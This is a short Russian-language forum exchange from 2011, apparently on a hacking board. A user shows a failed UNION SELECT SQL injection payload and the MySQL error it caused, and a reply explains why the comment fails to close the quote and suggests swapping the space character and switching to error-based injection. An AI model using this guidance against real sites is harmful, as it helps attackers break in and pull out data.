08.05.2011, 02:03
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
Провел на форуме:
3598
Репутация:
10
|
|
Сообщение от FreShBY
Есть страница
http://test/test/test.html
Попытался сделать инъекцию и вот что вышло
http://test/test/1'+UNION+SELECT+1,+2+--
Результат:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
Что я сделал не так и как "добить" эту дырку? Во-первых, коментарием " +--" ты кавычку не отсечешь.
Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
|
|
|